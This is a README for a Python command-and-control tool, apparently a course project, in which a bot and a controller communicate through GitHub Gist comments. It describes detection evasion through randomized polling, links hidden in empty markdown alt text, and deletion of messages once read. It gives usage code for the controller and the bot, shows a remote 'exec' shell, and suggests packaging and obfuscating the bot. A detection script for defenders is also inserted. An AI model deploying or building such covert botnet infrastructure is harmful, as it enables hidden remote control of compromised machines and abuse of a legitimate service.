C&C CLI controller and bot that use gist.github.com for communication.
The bot uses comments under a given Gist to communicate with the controller.
To evade detection, all intervals for pinging and checking new messages are randomized and some steganography is used (links in markdown are not shown if the alternate text field is empty).
If a message was "consumed" (read and responded to), it is immediately removed from the Gist comment thread.
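For defenders reviewing Gist comment threads, the empty-text links mentioned above are a usable detection signal. The following is an added example, not part of this project's code: it flags comment bodies containing markdown links whose text field is empty. It assumes the hidden data sits in the link target; the function names and sample comments are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# [](target) or ![](target): a markdown link/image whose text field is empty.
EMPTY_TEXT_LINK = re.compile(r"!?\[\s*\]\(\s*([^)\s]*)[^)]*\)")

def hidden_targets(body):
    """Return the targets of all empty-text markdown links in a comment body."""
    return EMPTY_TEXT_LINK.findall(body)

def looks_like_url(target):
    """True for an http(s) URL with a host; anything else is treated as opaque data."""
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed target, e.g. unbalanced IPv6 brackets
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)

def review_comment(body, max_len=120):
    """Summarise hidden-link findings for one comment; None when nothing is hidden."""
    targets = hidden_targets(body)
    if not targets:
        return None
    reasons = ["empty-text link"]
    if any(not looks_like_url(t) for t in targets):
        reasons.append("target is not a URL")
    if any(len(t) > max_len for t in targets):
        reasons.append("unusually long target")
    if not EMPTY_TEXT_LINK.sub("", body).strip():
        reasons.append("comment renders as empty")
    return {"hidden": len(targets), "reasons": reasons}

# Constructed sample comments (not taken from any real Gist).
SAMPLE_COMMENTS = [
    {"id": 1, "body": "Thanks, this snippet fixed my build."},
    {"id": 2, "body": "See the [docs](https://example.com/docs) for details."},
    {"id": 3, "body": "Nice gist! [](Y29uc3RydWN0ZWQtc2FtcGxlLXBheWxvYWQ=)"},
    {"id": 4, "body": "[](https://example.com/a)"},
]

def scan(comments):
    """Return {comment id: finding} for every comment that hides a link."""
    return {c["id"]: f for c in comments if (f := review_comment(c["body"]))}

if __name__ == "__main__":
    for cid, finding in scan(SAMPLE_COMMENTS).items():
        print(cid, finding)
```

Because consumed messages are deleted from the thread, a check like this has to run against comment bodies captured at the time they were posted rather than against the thread's current state.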
To run the controller, create another Python script that initializes the class Controller with the specified parameters.
```python
from controller import Controller


def main():
    controller = Controller(
        "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxx",  # GitHub Personal Access Token
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",  # Gist ID of the Gist to be used for communication
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx="  # 32-byte seed in Base64 (`openssl rand -base64 32`) used to generate the private key used for signing commands
    )


if __name__ == "__main__":
    main()
```
Right after startup, the controller prints a VerifyKey, which the bots use to verify the signed command messages.

```
Verify key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
(*)$
```
The interactive shell supports a couple of commands, which are described in the help menu.
```
(*)$ help
Gister Bot C&C CLI
==================
List of available commands:
status          => Prints the number of available bots
list            => Lists available (alive) bots
bot <bot id>    => Selects a bot to execute commands on
exec <command>  => Executes a command on a selected bot
exit            => Cleans up the communication channel and exits
```
To run the bot, create yet another Python script that initializes the class Bot with the specified parameters.
The VerifyKey used is generated by the controller on startup.
DO NOT USE THE 32-BYTE SECRET USED BY THE CONTROLLER IN THE BOT'S CONFIGURATION. THE BOT WILL NOT RESPOND TO MESSAGES SINCE THE SIGNATURES WON'T BE VALID, AND YOU WILL COMPROMISE THE CONFIDENTIALITY OF YOUR PRIVATE KEY.
```python
from bot import Bot


def main():
    bot = Bot(
        "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxx",  # GitHub Personal Access Token
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",  # Gist ID of the Gist to be used for communication
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx="  # The VerifyKey generated by the controller
    )


if __name__ == "__main__":
    main()
```
You can create stand-alone, self-contained executables from the scripts given in Usage using PyInstaller. You can also create Python scripts that contain the relevant classes, obfuscate them, and use those.
This project was made for educational purposes only, as part of the B4M36BSY course at the Faculty of Electrical Engineering, Czech Technical University in Prague.